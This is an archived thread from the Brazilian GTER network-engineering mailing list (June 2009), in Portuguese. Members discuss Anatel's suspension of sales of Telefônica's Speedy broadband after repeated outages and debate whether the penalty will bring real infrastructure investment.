2009/6/22 Rubens Kuhl > http://www.urbandictionary.com/define.php?term=cluebat > > > Rubens > > 2009/6/22 Danton Nunes > > > > On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: > > > >> Acho que dessa vez complicou [1] > >> > >> [1]. > >> > http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00-ANATEL+DETERMINA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html > >> -- > > > > sinceramente, eu acho pouco! > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- ============= Francisco Henrique C. Ferreira francisco.henrique at gmail.com UIN: 5328093 Linux Registered User #368514 -- gter list https://eng.registro.br/mailman/listinfo/gter From felipe at cescage.edu.br Mon Jun 22 15:24:13 2009 From: felipe at cescage.edu.br (Felipe Costa) Date: Mon, 22 Jun 2009 15:24:13 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A__=5BOFF=5D_Telef=F4nica=2C_complicou?= =?iso-8859-1?q?!!!?= In-Reply-To: <1D4EFC657D314B9198771CB00C512FAF@admgaz.com.br> References: <4A3F7FF0.70902@auroraalimentos.com.br> <6bb5f5b10906220742h53a9ddadoccc70f7e6a5c7a9e@mail.gmail.com> <138bd4780906220753jc521e5ap4c553be30c5faac4@mail.gmail.com> <1D4EFC657D314B9198771CB00C512FAF@admgaz.com.br> Message-ID: <000901c9f366$a4b7ea20$ee27be60$@edu.br> Gostaria de ver a cara daquele Dir. Financeiro que sempre bloqueou os projetos de melhora na rede dizendo n?o temos or?amento para isso no momento. Agora ? OBRIGADO a investir. Pessoal de infra soltando foguete.huauhauhauhahu Felipe Costa Gestor de TI felipe at cescage.edu.br -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Eduardo Schoedler Enviada em: segunda-feira, 22 de junho de 2009 14:36 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] [OFF] Telef?nica, complicou!!! Ao menos j? existe um precedente! Abra?o, Eduardo. ----- Original Message ----- From: "Francisco Henrique" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Monday, June 22, 2009 11:53 AM Subject: Re: [GTER] [OFF] Telef?nica, complicou!!! Infelizmente, o Velox est? indo pelo mesmo caminho 2009/6/22 Rubens Kuhl > http://www.urbandictionary.com/define.php?term=cluebat > > > Rubens > > 2009/6/22 Danton Nunes > > > > On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: > > > >> Acho que dessa vez complicou [1] > >> > >> [1]. > >> > http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00-ANATEL+DETERMI NA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html > >> -- > > > > sinceramente, eu acho pouco! > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- ============= Francisco Henrique C. Ferreira francisco.henrique at gmail.com UIN: 5328093 Linux Registered User #368514 -- gter list https://eng.registro.br/mailman/listinfo/gter -- gter list https://eng.registro.br/mailman/listinfo/gter __________ Information from ESET NOD32 Antivirus, version of virus signature database 4178 (20090622) __________ The message was checked by ESET NOD32 Antivirus. http://www.eset.com __________ Information from ESET NOD32 Antivirus, version of virus signature database 4179 (20090622) __________ The message was checked by ESET NOD32 Antivirus. http://www.eset.com From eschoedler at viavale.com.br Mon Jun 22 15:44:33 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Mon, 22 Jun 2009 15:44:33 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A__=5BOFF=5D_Telef=F4nica=2C_complicou?= =?iso-8859-1?q?!!!?= References: <4A3F7FF0.70902@auroraalimentos.com.br> <6bb5f5b10906220742h53a9ddadoccc70f7e6a5c7a9e@mail.gmail.com> <138bd4780906220753jc521e5ap4c553be30c5faac4@mail.gmail.com><1D4EFC657D314B9198771CB00C512FAF@admgaz.com.br> <000901c9f366$a4b7ea20$ee27be60$@edu.br> Message-ID: <4D0A48D2689C4B0CB1F9F8DBA53F8A69@admgaz.com.br> Felipe, veja que est?o falando de Speedy. At? onde eu sei, Speedy ? o nome do produto de ?ltima milha. Logo, n?o espere muitas mudan?as em infra de backhaul / backbone. Eduardo. ----- Original Message ----- From: "Felipe Costa" To: "'Grupo de Trabalho de Engenharia e Operacao de Redes'" Sent: Monday, June 22, 2009 3:24 PM Subject: [GTER] RES: [OFF] Telef?nica, complicou!!! Gostaria de ver a cara daquele Dir. Financeiro que sempre bloqueou os projetos de melhora na rede dizendo n?o temos or?amento para isso no momento. Agora ? OBRIGADO a investir. Pessoal de infra soltando foguete.huauhauhauhahu Felipe Costa Gestor de TI felipe at cescage.edu.br -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Eduardo Schoedler Enviada em: segunda-feira, 22 de junho de 2009 14:36 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] [OFF] Telef?nica, complicou!!! Ao menos j? existe um precedente! Abra?o, Eduardo. ----- Original Message ----- From: "Francisco Henrique" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Monday, June 22, 2009 11:53 AM Subject: Re: [GTER] [OFF] Telef?nica, complicou!!! Infelizmente, o Velox est? indo pelo mesmo caminho 2009/6/22 Rubens Kuhl > http://www.urbandictionary.com/define.php?term=cluebat > > > Rubens > > 2009/6/22 Danton Nunes > > > > On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: > > > >> Acho que dessa vez complicou [1] > >> > >> [1]. > >> > http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00-ANATEL+DETERMI NA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html > >> -- > > > > sinceramente, eu acho pouco! -- ============= Francisco Henrique C. Ferreira francisco.henrique at gmail.com UIN: 5328093 Linux Registered User #368514 From frederick at dahype.org Mon Jun 22 15:49:28 2009 From: frederick at dahype.org (Renato Frederick) Date: Mon, 22 Jun 2009 14:49:28 -0400 Subject: [GTER] =?iso-8859-1?q?RES=3A_=09RES=3A__=5BOFF=5D_Telef=F4nica=2C?= =?iso-8859-1?q?_complicou!!!?= In-Reply-To: <4D0A48D2689C4B0CB1F9F8DBA53F8A69@admgaz.com.br> References: <4A3F7FF0.70902@auroraalimentos.com.br> <6bb5f5b10906220742h53a9ddadoccc70f7e6a5c7a9e@mail.gmail.com> <138bd4780906220753jc521e5ap4c553be30c5faac4@mail.gmail.com><1D4EFC657D314B9198771CB00C512FAF@admgaz.com.br> <000901c9f366$a4b7ea20$ee27be60$@edu.br> <4D0A48D2689C4B0CB1F9F8DBA53F8A69@admgaz.com.br> Message-ID: Ou ent?o daqui a alguns meses uma demiss?o em massa para garantir que o investimento feito(se ? que ser? feito) n?o prejudicar? os lucros, com a justificativa que "o governo nos atrapalhou". E claro, contrata??o de funcion?rios bem menos qualificados que os atuais para a m?dio prazo deteriorar qualquer melhoria. Duvido que esta puni??o trar? algo de bom, acredito que v? terminar em uma bela pizza a moda com borda rechada. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Eduardo Schoedler > Enviada em: segunda-feira, 22 de junho de 2009 15:45 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] RES: [OFF] Telef?nica, complicou!!! > > Felipe, veja que est?o falando de Speedy. > At? onde eu sei, Speedy ? o nome do produto de ?ltima milha. > > Logo, n?o espere muitas mudan?as em infra de backhaul / backbone. > > Eduardo. > > > ----- Original Message ----- > From: "Felipe Costa" > To: "'Grupo de Trabalho de Engenharia e Operacao de Redes'" > > Sent: Monday, June 22, 2009 3:24 PM > Subject: [GTER] RES: [OFF] Telef?nica, complicou!!! > > > Gostaria de ver a cara daquele Dir. Financeiro que sempre bloqueou > os projetos de melhora na rede dizendo n?o temos or?amento para isso no > momento. Agora ? OBRIGADO a investir. Pessoal de infra soltando > foguete.huauhauhauhahu > > Felipe Costa > Gestor de TI > felipe at cescage.edu.br > > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em > nome de Eduardo Schoedler > Enviada em: segunda-feira, 22 de junho de 2009 14:36 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] [OFF] Telef?nica, complicou!!! > > Ao menos j? existe um precedente! > > Abra?o, > Eduardo. > > > ----- Original Message ----- > From: "Francisco Henrique" > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > Sent: Monday, June 22, 2009 11:53 AM > Subject: Re: [GTER] [OFF] Telef?nica, complicou!!! > > > Infelizmente, o Velox est? indo pelo mesmo caminho > > 2009/6/22 Rubens Kuhl > > > http://www.urbandictionary.com/define.php?term=cluebat > > > > > > Rubens > > > > 2009/6/22 Danton Nunes > > > > > > On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: > > > > > >> Acho que dessa vez complicou [1] > > >> > > >> [1]. > > >> > > > http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00- > ANATEL+DETERMI > NA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html > > >> -- > > > > > > sinceramente, eu acho pouco! > > -- > ============= > Francisco Henrique C. Ferreira > francisco.henrique at gmail.com > UIN: 5328093 > Linux Registered User #368514 > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From MBORBA at trf3.jus.br Mon Jun 22 16:38:42 2009 From: MBORBA at trf3.jus.br (MARLON BORBA) Date: Mon, 22 Jun 2009 16:38:42 -0300 Subject: [GTER] =?windows-1252?q?RES=3A__=5BOFF=5D_Telef=F4nica=2C_complic?= =?windows-1252?q?ou!!!?= In-Reply-To: <000901c9f366$a4b7ea20$ee27be60$@edu.br> References: <4A3F7FF0.70902@auroraalimentos.com.br> <6bb5f5b10906220742h53a9ddadoccc70f7e6a5c7a9e@mail.gmail.com> <138bd4780906220753jc521e5ap4c553be30c5faac4@mail.gmail.com> <1D4EFC657D314B9198771CB00C512FAF@admgaz.com.br><1D4EFC657D314B9198771CB00C512FAF@admgaz.com.br> <000901c9f366$a4b7ea20$ee27be60$@edu.br> Message-ID: <4A3FB34F.15A6.0046.0@trf3.jus.br> H? muita melhoria que pode ser feita sem o uso do vil-metal. Ader?ncia a boas pr?ticas (por exemplo, configura??es CORRETAS de DNS) seria um bom come?o. -- Abra?os, Marlon Borba, CISSP, APC DataCenter Associate T?cnico Judici?rio ? Seguran?a da Informa??o Comiss?o Local de Resposta a Incidentes - CLRI TRF 3 Regi?o (11) 3012-1581 -- Practically no IT system is risk free. (NIST Special Publication 800-30) -- Em 22/6/2009 ?s 15:24, "Felipe Costa" gravou: > Gostaria de ver a cara daquele Dir. Financeiro que sempre bloqueou > os projetos de melhora na rede dizendo n?o temos or?amento para isso no > momento. Agora ? OBRIGADO a investir. Pessoal de infra soltando > foguete.huauhauhauhahu [....] From security at neogrid.com Mon Jun 22 16:43:07 2009 From: security at neogrid.com (NOC NeoGrid) Date: Mon, 22 Jun 2009 16:43:07 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A__=5BOFF=5D_Telef=F4nica=2C_complicou?= =?iso-8859-1?q?!!!?= Message-ID: Segundo o Di?rio Oficial da Uni?o... N? 116, segunda-feira, 22 de junho de 2009.... N? 4.043/2009-CD - Processo no 53500.011781/ 2009 O CONSELHO DIRETOR DA AG?NCIA NACIONAL DE TELECOMUNICA??ES, no uso das atribui??es que lhe foram conferidas pelo art. 22 da Lei n.? 9.472, de 16 de julho de 1997, pelo art. 35 do Regulamento da Ag?ncia Nacional de Telecomunica??es, aprovado pelo Decreto n.? 2.338, de 7 de outubro de 1997, e pelo art. 175 do Regimento Interno da Ag?ncia, aprovado pela Resolu??o n.? 270, de 19 de julho de 2001 e alterado pela Resolu??o n.? 489, de 5 de dezembro de 2007, Considerando a crescente evolu??o das reclama??es de usu?rios do Servi?o de Comunica??o Multim?dia comercializado como "SERVI?O SPEEDY" pela Telecomunica??es de S?o Paulo S/A e a constata??o de que n?mero expressivo de usu?rios foi atingido por interrup??es reiteradas, que inclusive motivaram a abertura dos Procedimentos para Apura??o de Descumprimento de Obriga??es - PADO(s) n. 53504.020157/2008 e 53504.016748/2008; Considerando as conseq??ncias das diversas interrup??es na presta??o do Servi?o de Comunica??o Multim?dia pela Telecomu- nica??es de S?o Paulo S/A, no Estado de S?o Paulo, comercializado como "SERVI?O SPEEDY"................ PROIBIDA A VENDA... Att, Dilson. -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Renato Frederick Enviada em: segunda-feira, 22 de junho de 2009 15:49 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: [GTER] RES: RES: [OFF] Telef?nica, complicou!!! Ou ent?o daqui a alguns meses uma demiss?o em massa para garantir que o investimento feito(se ? que ser? feito) n?o prejudicar? os lucros, com a justificativa que "o governo nos atrapalhou". E claro, contrata??o de funcion?rios bem menos qualificados que os atuais para a m?dio prazo deteriorar qualquer melhoria. Duvido que esta puni??o trar? algo de bom, acredito que v? terminar em uma bela pizza a moda com borda rechada. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Eduardo Schoedler > Enviada em: segunda-feira, 22 de junho de 2009 15:45 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] RES: [OFF] Telef?nica, complicou!!! > > Felipe, veja que est?o falando de Speedy. > At? onde eu sei, Speedy ? o nome do produto de ?ltima milha. > > Logo, n?o espere muitas mudan?as em infra de backhaul / backbone. > > Eduardo. > > > ----- Original Message ----- > From: "Felipe Costa" > To: "'Grupo de Trabalho de Engenharia e Operacao de Redes'" > > Sent: Monday, June 22, 2009 3:24 PM > Subject: [GTER] RES: [OFF] Telef?nica, complicou!!! > > > Gostaria de ver a cara daquele Dir. Financeiro que sempre bloqueou > os projetos de melhora na rede dizendo n?o temos or?amento para isso no > momento. Agora ? OBRIGADO a investir. Pessoal de infra soltando > foguete.huauhauhauhahu > > Felipe Costa > Gestor de TI > felipe at cescage.edu.br > > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em > nome de Eduardo Schoedler > Enviada em: segunda-feira, 22 de junho de 2009 14:36 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] [OFF] Telef?nica, complicou!!! > > Ao menos j? existe um precedente! > > Abra?o, > Eduardo. > > > ----- Original Message ----- > From: "Francisco Henrique" > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > Sent: Monday, June 22, 2009 11:53 AM > Subject: Re: [GTER] [OFF] Telef?nica, complicou!!! > > > Infelizmente, o Velox est? indo pelo mesmo caminho > > 2009/6/22 Rubens Kuhl > > > http://www.urbandictionary.com/define.php?term=cluebat > > > > > > Rubens > > > > 2009/6/22 Danton Nunes > > > > > > On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: > > > > > >> Acho que dessa vez complicou [1] > > >> > > >> [1]. > > >> > > > http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00- > ANATEL+DETERMI > NA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html > > >> -- > > > > > > sinceramente, eu acho pouco! > > -- > ============= > Francisco Henrique C. Ferreira > francisco.henrique at gmail.com > UIN: 5328093 > Linux Registered User #368514 > > -- > gter list https://eng.registro.br/mailman/listinfo/gter -- gter list https://eng.registro.br/mailman/listinfo/gter From ce.langoni at gmail.com Mon Jun 22 15:56:02 2009 From: ce.langoni at gmail.com (Carlos Eduardo Langoni) Date: Mon, 22 Jun 2009 15:56:02 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_RES=3A_=5BOFF=5D_Telef=F4nica=2C_com?= =?iso-8859-1?q?plicou!!!?= In-Reply-To: References: <4A3F7FF0.70902@auroraalimentos.com.br> <6bb5f5b10906220742h53a9ddadoccc70f7e6a5c7a9e@mail.gmail.com> <138bd4780906220753jc521e5ap4c553be30c5faac4@mail.gmail.com> <1D4EFC657D314B9198771CB00C512FAF@admgaz.com.br> <000901c9f366$a4b7ea20$ee27be60$@edu.br> <4D0A48D2689C4B0CB1F9F8DBA53F8A69@admgaz.com.br> Message-ID: <8aa07a210906221156v31b8bffme4f7668256f2a653@mail.gmail.com> Renato, Concordo com voc?! Em g?nero, n?mero e grau, acho que tr?s mais preju?zo do que benef?cios para os usu?rios, mas vamos aguardar o final, quem sabe um milagre acontece e tudo ser? como deveria :D Abra?os a todos! 2009/6/22 Renato Frederick : > Ou ent?o daqui a alguns meses uma demiss?o em massa para garantir que o investimento feito(se ? que ser? feito) n?o prejudicar? os lucros, com a justificativa que "o governo nos atrapalhou". > > E claro, contrata??o de funcion?rios bem menos qualificados que os atuais para a m?dio prazo deteriorar qualquer melhoria. > > Duvido que esta puni??o trar? algo de bom, acredito que v? terminar em uma bela pizza a moda com borda rechada. > > > > > >> -----Mensagem original----- >> De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] >> Em nome de Eduardo Schoedler >> Enviada em: segunda-feira, 22 de junho de 2009 15:45 >> Para: Grupo de Trabalho de Engenharia e Operacao de Redes >> Assunto: Re: [GTER] RES: [OFF] Telef?nica, complicou!!! >> >> Felipe, veja que est?o falando de Speedy. >> At? onde eu sei, Speedy ? o nome do produto de ?ltima milha. >> >> Logo, n?o espere muitas mudan?as em infra de backhaul / backbone. >> >> Eduardo. >> >> >> ----- Original Message ----- >> From: "Felipe Costa" >> To: "'Grupo de Trabalho de Engenharia e Operacao de Redes'" >> >> Sent: Monday, June 22, 2009 3:24 PM >> Subject: [GTER] RES: [OFF] Telef?nica, complicou!!! >> >> >> Gostaria de ver a cara daquele Dir. Financeiro que sempre bloqueou >> os projetos de melhora na rede dizendo n?o temos or?amento para isso no >> momento. Agora ? OBRIGADO a investir. Pessoal de infra soltando >> foguete.huauhauhauhahu >> >> Felipe Costa >> Gestor de TI >> felipe at cescage.edu.br >> >> -----Mensagem original----- >> De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] >> Em >> nome de Eduardo Schoedler >> Enviada em: segunda-feira, 22 de junho de 2009 14:36 >> Para: Grupo de Trabalho de Engenharia e Operacao de Redes >> Assunto: Re: [GTER] [OFF] Telef?nica, complicou!!! >> >> Ao menos j? existe um precedente! >> >> Abra?o, >> Eduardo. >> >> >> ----- Original Message ----- >> From: "Francisco Henrique" >> To: "Grupo de Trabalho de Engenharia e Operacao de Redes" >> >> Sent: Monday, June 22, 2009 11:53 AM >> Subject: Re: [GTER] [OFF] Telef?nica, complicou!!! >> >> >> Infelizmente, o Velox est? indo pelo mesmo caminho >> >> 2009/6/22 Rubens Kuhl >> >> > http://www.urbandictionary.com/define.php?term=cluebat >> > >> > >> > Rubens >> > >> > 2009/6/22 Danton Nunes >> > > >> > > On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: >> > > >> > >> Acho que dessa vez complicou [1] >> > >> >> > >> [1]. >> > >> >> > >> http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00- >> ANATEL+DETERMI >> NA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html >> > >> -- >> > > >> > > sinceramente, eu acho pouco! >> >> -- >> ============= >> Francisco Henrique C. Ferreira >> francisco.henrique at gmail.com >> UIN: 5328093 >> Linux Registered User #368514 >> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From oliveira at unidatec.com.br Mon Jun 22 16:01:41 2009 From: oliveira at unidatec.com.br (Daniel Oliveira) Date: Mon, 22 Jun 2009 16:01:41 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_=09RES=3A__=5BOFF=5D_Telef=F4nica=2C?= =?iso-8859-1?q?_complicou!!!?= In-Reply-To: References: <4A3F7FF0.70902@auroraalimentos.com.br> <6bb5f5b10906220742h53a9ddadoccc70f7e6a5c7a9e@mail.gmail.com> <138bd4780906220753jc521e5ap4c553be30c5faac4@mail.gmail.com><1D4EFC657D314B9198771CB00C512FAF@admgaz.com.br> <000901c9f366$a4b7ea20$ee27be60$@edu.br> <4D0A48D2689C4B0CB1F9F8DBA53F8A69@admgaz.com.br> Message-ID: <20F5416C-14AD-478F-B51E-0FA0D565714C@unidatec.com.br> Verdade, segundo o G1 os caras ainda est?o comercializando o Speedy, na certa a telef?nica (brasileirissima) vai dar um jeitinho nessas multas. Qual ser? o pr?ximo nome do produto da telef?nica?... kkkkkk, sei que vai ser a mesma estrutura de rede, com um nome mais agrad?vel. Abss On 22/06/2009, at 15:49, Renato Frederick wrote: > Ou ent?o daqui a alguns meses uma demiss?o em massa para garantir > que o investimento feito(se ? que ser? feito) n?o prejudicar? os > lucros, com a justificativa que "o governo nos atrapalhou". > > E claro, contrata??o de funcion?rios bem menos qualificados que os > atuais para a m?dio prazo deteriorar qualquer melhoria. > > Duvido que esta puni??o trar? algo de bom, acredito que v? terminar > em uma bela pizza a moda com borda rechada. > > > > > >> -----Mensagem original----- >> De: gter-bounces at eng.registro.br [mailto:gter- >> bounces at eng.registro.br] >> Em nome de Eduardo Schoedler >> Enviada em: segunda-feira, 22 de junho de 2009 15:45 >> Para: Grupo de Trabalho de Engenharia e Operacao de Redes >> Assunto: Re: [GTER] RES: [OFF] Telef?nica, complicou!!! >> >> Felipe, veja que est?o falando de Speedy. >> At? onde eu sei, Speedy ? o nome do produto de ?ltima milha. >> >> Logo, n?o espere muitas mudan?as em infra de backhaul / backbone. >> >> Eduardo. >> >> >> ----- Original Message ----- >> From: "Felipe Costa" >> To: "'Grupo de Trabalho de Engenharia e Operacao de Redes'" >> >> Sent: Monday, June 22, 2009 3:24 PM >> Subject: [GTER] RES: [OFF] Telef?nica, complicou!!! >> >> >> Gostaria de ver a cara daquele Dir. Financeiro que sempre bloqueou >> os projetos de melhora na rede dizendo n?o temos or?amento para >> isso no >> momento. Agora ? OBRIGADO a investir. Pessoal de infra soltando >> foguete.huauhauhauhahu >> >> Felipe Costa >> Gestor de TI >> felipe at cescage.edu.br >> >> -----Mensagem original----- >> De: gter-bounces at eng.registro.br [mailto:gter- >> bounces at eng.registro.br] >> Em >> nome de Eduardo Schoedler >> Enviada em: segunda-feira, 22 de junho de 2009 14:36 >> Para: Grupo de Trabalho de Engenharia e Operacao de Redes >> Assunto: Re: [GTER] [OFF] Telef?nica, complicou!!! >> >> Ao menos j? existe um precedente! >> >> Abra?o, >> Eduardo. >> >> >> ----- Original Message ----- >> From: "Francisco Henrique" >> To: "Grupo de Trabalho de Engenharia e Operacao de Redes" >> >> Sent: Monday, June 22, 2009 11:53 AM >> Subject: Re: [GTER] [OFF] Telef?nica, complicou!!! >> >> >> Infelizmente, o Velox est? indo pelo mesmo caminho >> >> 2009/6/22 Rubens Kuhl >> >>> http://www.urbandictionary.com/define.php?term=cluebat >>> >>> >>> Rubens >>> >>> 2009/6/22 Danton Nunes >>>> >>>> On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: >>>> >>>>> Acho que dessa vez complicou [1] >>>>> >>>>> [1]. >>>>> >>> >> http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00- >> ANATEL+DETERMI >> NA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html >>>>> -- >>>> >>>> sinceramente, eu acho pouco! >> >> -- >> ============= >> Francisco Henrique C. Ferreira >> francisco.henrique at gmail.com >> UIN: 5328093 >> Linux Registered User #368514 >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter Daniel Oliveira Project Manager 55 11 3596 6500 55 11 8182 3151 Mobile Skype me | Facebook | Orkut | Twitter As informa??es existentes nessa mensagem e nos arquivos anexados s?o para uso restrito, sendo seu sigilo protegido por lei. Caso n?o seja destinat?rio, saiba que leitura, divulga??o ou c?pia s?o proibidas. Favor apagar as informa??es e notificar o remetente. O uso impr?prio ser? tratado conforme as normas da empresa e a legisla??o em vigor. The information contained in this message and in the attached files are restricted, and its confidentiality protected by law. In case you are not the addressee, be aware that the reading, spreading and copy of this message is unauthorized. Please, delete this message and notify the sender. The improper use of this information will be treated according the company's internal rules and legal laws. From cleber-listas at inetweb.com.br Mon Jun 22 16:05:24 2009 From: cleber-listas at inetweb.com.br (Cleber - Listas) Date: Mon, 22 Jun 2009 16:05:24 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A__RES=3A_=09RES=3A__=5BOFF=5D_Telef?= =?iso-8859-1?q?=F4nica=2C_complicou!!!?= In-Reply-To: References: <4A3F7FF0.70902@auroraalimentos.com.br><6bb5f5b10906220742h53a9ddadoccc70f7e6a5c7a9e@mail.gmail.com><138bd4780906220753jc521e5ap4c553be30c5faac4@mail.gmail.com><1D4EFC657D314B9198771CB00C512FAF@admgaz.com.br><000901c9f366$a4b7ea20$ee27be60$@edu.br><4D0A48D2689C4B0CB1F9F8DBA53F8A69@admgaz.com.br> Message-ID: <070CC1E405074ED9BF2AED705A7FDF74@INETWEB.local> Eu acredito que esta puni??o somente est? ocorrendo pois ? um servi?o de grande escala e a popula??o faz press?o sobre o org?o. A Anatel ? extremamente omissa quanto ? ao que lhe compete como "Org?o Regulador" Sinceramente, vai acabar em pizza! ? coisa de gente grande isso e rola muito $$ -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Renato Frederick Enviada em: segunda-feira, 22 de junho de 2009 15:49 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: [GTER] RES: RES: [OFF] Telef?nica, complicou!!! Ou ent?o daqui a alguns meses uma demiss?o em massa para garantir que o investimento feito(se ? que ser? feito) n?o prejudicar? os lucros, com a justificativa que "o governo nos atrapalhou". E claro, contrata??o de funcion?rios bem menos qualificados que os atuais para a m?dio prazo deteriorar qualquer melhoria. Duvido que esta puni??o trar? algo de bom, acredito que v? terminar em uma bela pizza a moda com borda rechada. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Eduardo Schoedler > Enviada em: segunda-feira, 22 de junho de 2009 15:45 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] RES: [OFF] Telef?nica, complicou!!! > > Felipe, veja que est?o falando de Speedy. > At? onde eu sei, Speedy ? o nome do produto de ?ltima milha. > > Logo, n?o espere muitas mudan?as em infra de backhaul / backbone. > > Eduardo. > > > ----- Original Message ----- > From: "Felipe Costa" > To: "'Grupo de Trabalho de Engenharia e Operacao de Redes'" > > Sent: Monday, June 22, 2009 3:24 PM > Subject: [GTER] RES: [OFF] Telef?nica, complicou!!! > > > Gostaria de ver a cara daquele Dir. Financeiro que sempre bloqueou os > projetos de melhora na rede dizendo n?o temos or?amento para isso no > momento. Agora ? OBRIGADO a investir. Pessoal de infra soltando > foguete.huauhauhauhahu > > Felipe Costa > Gestor de TI > felipe at cescage.edu.br > > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em > nome de Eduardo Schoedler > Enviada em: segunda-feira, 22 de junho de 2009 14:36 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] [OFF] Telef?nica, complicou!!! > > Ao menos j? existe um precedente! > > Abra?o, > Eduardo. > > > ----- Original Message ----- > From: "Francisco Henrique" > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > Sent: Monday, June 22, 2009 11:53 AM > Subject: Re: [GTER] [OFF] Telef?nica, complicou!!! > > > Infelizmente, o Velox est? indo pelo mesmo caminho > > 2009/6/22 Rubens Kuhl > > > http://www.urbandictionary.com/define.php?term=cluebat > > > > > > Rubens > > > > 2009/6/22 Danton Nunes > > > > > > On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: > > > > > >> Acho que dessa vez complicou [1] > > >> > > >> [1]. > > >> > > > http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00- > ANATEL+DETERMI > NA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html > > >> -- > > > > > > sinceramente, eu acho pouco! > > -- > ============= > Francisco Henrique C. Ferreira > francisco.henrique at gmail.com > UIN: 5328093 > Linux Registered User #368514 > > -- > gter list https://eng.registro.br/mailman/listinfo/gter -- gter list https://eng.registro.br/mailman/listinfo/gter Nenhum v?rus encontrado nessa mensagem recebida. Verificado por AVG - www.avgbrasil.com.br Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.87/2195 - Data de Lan?amento: 06/22/09 06:54:00 From jefferson at maglio.com.br Mon Jun 22 16:42:55 2009 From: jefferson at maglio.com.br (Jefferson Maglio) Date: Mon, 22 Jun 2009 16:42:55 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_RES=3A_=5BOFF=5D_Telef=F4nica=2C_com?= =?iso-8859-1?q?plicou!!!?= In-Reply-To: References: <4A3F7FF0.70902@auroraalimentos.com.br> <6bb5f5b10906220742h53a9ddadoccc70f7e6a5c7a9e@mail.gmail.com> <138bd4780906220753jc521e5ap4c553be30c5faac4@mail.gmail.com> <1D4EFC657D314B9198771CB00C512FAF@admgaz.com.br> <000901c9f366$a4b7ea20$ee27be60$@edu.br> <4D0A48D2689C4B0CB1F9F8DBA53F8A69@admgaz.com.br> Message-ID: <609a81f60906221242i6aee5d50r389ea40504c76c46@mail.gmail.com> A decis?o ? apropriada... no entanto... Algu?m ja ligou tentando contratar o speedy ?? heheheheehehe alguma d?vida ? 2009/6/22 Renato Frederick > Ou ent?o daqui a alguns meses uma demiss?o em massa para garantir que o 